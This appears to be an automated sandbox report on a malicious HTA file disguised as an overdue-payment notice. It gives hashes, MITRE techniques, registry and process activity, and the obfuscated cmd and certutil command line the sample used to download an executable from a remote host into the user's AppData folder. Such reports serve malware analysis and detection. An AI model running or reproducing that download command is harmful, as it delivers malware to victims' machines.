3996b5a66262b9cf59b38a399d0467dae23a4044ddf26da24aa292659f3c0803

Analysis

max time kernel
117s
max time network
120s
platform
windows7_x64
resource
win7-20230831-en
resource tags

arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
submitted
25-09-2023 10:02

Target

mkhg_Overdue_payment.hta
Size

9KB
MD5

b9dfe024b3df498c61441d3f2f1bb498
SHA1

1d12bec3e863aa225f7be5008598dd953e23dc05
SHA256

3996b5a66262b9cf59b38a399d0467dae23a4044ddf26da24aa292659f3c0803
SHA512

833887996411ab1614f9cb750ad8516eaf223c8af8db0919f75a3d05a8460c5a925fa62193f8c447cbcc5073252300d3d9dd2c56a295f9a198433f566a398a65
SSDEEP

24:vVPaQJWpXy7RZnHDACVYxdNAbaCs58ms1e5XTldVbZiNMG:TJCy7R1ydNAbaHXtZG

Score

5^/10

An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs

Processes:

cmd.exe

pid process

2432 cmd.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Modifies Internet Explorer settings 1 TTPs 1 IoCs
adware spyware

Modify Registry
T1112

Processes:

mshta.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\Main mshta.exe

pid	process
2432	cmd.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious use of WriteProcessMemory 16 IoCs

Processes:

mshta.execmd.execmd.exe

description	pid	process	target process
PID 2420 wrote to memory of 2432	2420	mshta.exe	cmd.exe
PID 2420 wrote to memory of 2432	2420	mshta.exe	cmd.exe
PID 2420 wrote to memory of 2432	2420	mshta.exe	cmd.exe
PID 2420 wrote to memory of 2432	2420	mshta.exe	cmd.exe
PID 2432 wrote to memory of 744	2432	cmd.exe	cmd.exe
PID 2432 wrote to memory of 744	2432	cmd.exe	cmd.exe
PID 2432 wrote to memory of 744	2432	cmd.exe	cmd.exe
PID 2432 wrote to memory of 744	2432	cmd.exe	cmd.exe
PID 2432 wrote to memory of 2996	2432	cmd.exe	cmd.exe
PID 2432 wrote to memory of 2996	2432	cmd.exe	cmd.exe
PID 2432 wrote to memory of 2996	2432	cmd.exe	cmd.exe
PID 2432 wrote to memory of 2996	2432	cmd.exe	cmd.exe
PID 744 wrote to memory of 1876	744	cmd.exe	certutil.exe
PID 744 wrote to memory of 1876	744	cmd.exe	certutil.exe
PID 744 wrote to memory of 1876	744	cmd.exe	certutil.exe
PID 744 wrote to memory of 1876	744	cmd.exe	certutil.exe

C:\Windows\SysWOW64\cmd.exe
Cmd /C sTaRt /b /mIn ceRTUTIL.exE -UrLcacHe -SPLit -F https://voilarape.online/invoice/docdad20230925.exe C:\Users\Admin\AppData\Roaming\TestPutty.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:744

C:\Windows\SysWOW64\certutil.exe
ceRTUTIL.exE -UrLcacHe -SPLit -F https://voilarape.online/invoice/docdad20230925.exe C:\Users\Admin\AppData\Roaming\TestPutty.exe
4⤵
PID:1876

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

Credential Access

Discovery

System Information Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

memory/2432-10-0x0000000000770000-0x0000000000771000-memory.dmp

Filesize
4KB

Download